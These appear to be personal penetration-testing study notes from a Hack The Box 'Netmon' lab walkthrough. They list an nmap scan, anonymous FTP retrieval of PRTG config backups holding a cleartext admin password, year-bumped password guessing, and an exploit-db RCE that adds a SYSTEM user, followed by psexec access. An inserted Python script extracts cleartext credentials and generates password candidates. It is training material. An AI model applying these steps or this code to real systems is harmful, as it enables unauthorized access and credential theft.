TCM PEH Hacking Netmon Notes


HTB Netmon

Recording actions to derive method.

nmap -T4 -A -p- 10.10.10.152
Noted open port 21 ftp
Noted ftp allows anonymous login
Noted ftp is basically entire Windows C:
Noted open port 80 http
Noted port 80 PRTG Network Monitor 18.1.37
Noted Windows Server 2008 R2 OS


Visited http://10.10.10.152:80
Noted PRTG Network Monitor
Googled PRTG Network Monitor default credentials
Found PRTG knowledgebase results prtgadmin:prtgadmin
Tested creds, failed
Googled prtg network monitor exploits
Found exploit-db RCE (Authenticated)
FTP is sharing out C:
Googled prtg network monitor db file location
Found prtg knowledgebase results with several locations


ftp 10.10.10.152
anonymous
Enter
ls
cd Users
ls
ls -la
Noted hidden directories
cd "All Users"
ls -la
cd "Application Data"
Noted Access Denied
cd "Application Data\Paessler\PRTG Network Monitor"
Noted this was successful!!!
ls
Noted PRTG Configuration files
get "PRTG Configuration.dat"
get "PRTG Configuration.old"
get "PRTG Configuration.old.bak"
bye


ls | grep PRTG
Noted all 3 files are here
cat PRTG\ Configuration.dat | grep prtgadmin
Noted the default cred is here
gedit PRTG\ Configuration.dat
ctrl+f
prtgadmin
Noted that password for prtgadmin is encrypted
Closed
gedit PRTG\ Configuration.old
ctrl+f
prtgadmin
Noted that password for prtgadmin is encrypted
Closed
gedit PRTG\ Configuration.old.bak
ctrl+f
prtgadmin
Noted password for prtgadmin is in clear text (ends in str 2018)
Copied password


Went back to 10.10.10.152:80
Tried password, failed
Tried password with 2018 replaced with 2019, success
Logged into PRTG Netmon Dashboard
Noted exploit-db RCE (Authenticated) requires a cookie
Opened burp
Started proxy and intercept
Copied exploit-db payload
gedit new.sh
Pasted exploit into it
Saved & Exit
chmod +x new.sh
./new.sh http://10.10.10.152 -c "<pasted cookie here>"
Exploit is running, trying to create new NT\System user pentest:P3nT3st on remote machine
Exploit completed
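Added example (my own code, not part of the original notes or of PRTG): a small Python triage script covering the two steps above, grepping the three PRTG Configuration files for the prtgadmin entry and then turning the 2018 -> 2019 guess into a general year-bump helper. The file contents are constructed stand-ins, not the real Netmon files, and the element names (<user>, <login>, <password>, <dbpassword>) are an assumption about the real config layout, kept minimal to show the idea: an encrypted value is useless offline, a cleartext value is a candidate, and a cleartext value ending in a year is worth retrying with the year bumped because of rotation habits.

```python
import re
from typing import Dict, List, Optional

# Constructed stand-ins for the three files pulled over FTP (not the real files).
# The XML layout is an assumption about PRTG's format, simplified for the example.
SAMPLE_FILES: Dict[str, str] = {
    "PRTG Configuration.dat": """
<user>
  <login>prtgadmin</login>
  <password>
    <flags><encrypted/></flags>
    <cell col="0" crypt="PRTG">JO3Y7LLK7IBJEQ2NEIDAW7XAHHLD7AXM</cell>
  </password>
</user>
""",
    "PRTG Configuration.old": """
<user>
  <login>prtgadmin</login>
  <password>
    <flags><encrypted/></flags>
    <cell col="0" crypt="PRTG">Q2NEIDAW7XAHHLD7AXMJO3Y7LLK7IBJE</cell>
  </password>
</user>
""",
    "PRTG Configuration.old.bak": """
<user>
  <login>prtgadmin</login>
  <dbpassword>
    <!-- User: prtgadmin -->
    S0meP@ss2018
  </dbpassword>
</user>
""",
}

USER_RE = re.compile(r"<user>(.*?)</user>", re.S)
LOGIN_RE = re.compile(r"<login>\s*(.*?)\s*</login>", re.S)
CLEAR_RE = re.compile(r"<dbpassword>(.*?)</dbpassword>", re.S)
COMMENT_RE = re.compile(r"<!--.*?-->", re.S)
YEAR_RE = re.compile(r"^(.*?)(\d{4})$")


def extract_credentials(config_text: str) -> List[dict]:
    """One record per <user> block: login, whether it is marked encrypted,
    and the cleartext value if a <dbpassword> element carries one."""
    records = []
    for block in USER_RE.findall(config_text):
        login = LOGIN_RE.search(block)
        if not login:
            continue
        cleartext: Optional[str] = None
        clear = CLEAR_RE.search(block)
        if clear:
            # Drop any embedded XML comment, then trim surrounding whitespace.
            cleartext = COMMENT_RE.sub("", clear.group(1)).strip() or None
        records.append({
            "login": login.group(1),
            "encrypted": "<encrypted/>" in block,
            "cleartext": cleartext,
        })
    return records


def year_variants(password: str, span: int = 2) -> List[str]:
    """Original password first, then copies with a trailing 4-digit year
    bumped by 1..span (the rotation pattern seen in these notes)."""
    variants = [password]
    m = YEAR_RE.match(password)
    if m:
        prefix, year = m.group(1), int(m.group(2))
        variants += [f"{prefix}{year + i}" for i in range(1, span + 1)]
    return variants


def candidate_passwords(files: Dict[str, str], login: str = "prtgadmin") -> List[str]:
    """Ordered, de-duplicated candidate list for `login` across every file."""
    candidates: List[str] = []
    for text in files.values():
        for rec in extract_credentials(text):
            if rec["login"] != login or rec["cleartext"] is None:
                continue  # encrypted blobs are skipped; nothing to try offline
            for cand in year_variants(rec["cleartext"]):
                if cand not in candidates:
                    candidates.append(cand)
    return candidates


if __name__ == "__main__":
    for name, text in SAMPLE_FILES.items():
        for rec in extract_credentials(text):
            state = "cleartext" if rec["cleartext"] else ("encrypted" if rec["encrypted"] else "unknown")
            print(f"{name}: {rec['login']} -> {state}")
    print("try in order:", candidate_passwords(SAMPLE_FILES))
```

Run it against the real downloaded files by replacing SAMPLE_FILES with their contents; the year bump is deliberately naive (any trailing four digits count as a year), so review the candidate list before pointing it at a login form with lockout.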


Installed impacket(https://github.com/SecureAuthCorp/impacket)
psexec.py pentest:"P3nT3st"@10.10.10.152
Spawned a shell!!
whoami
nt authority\system
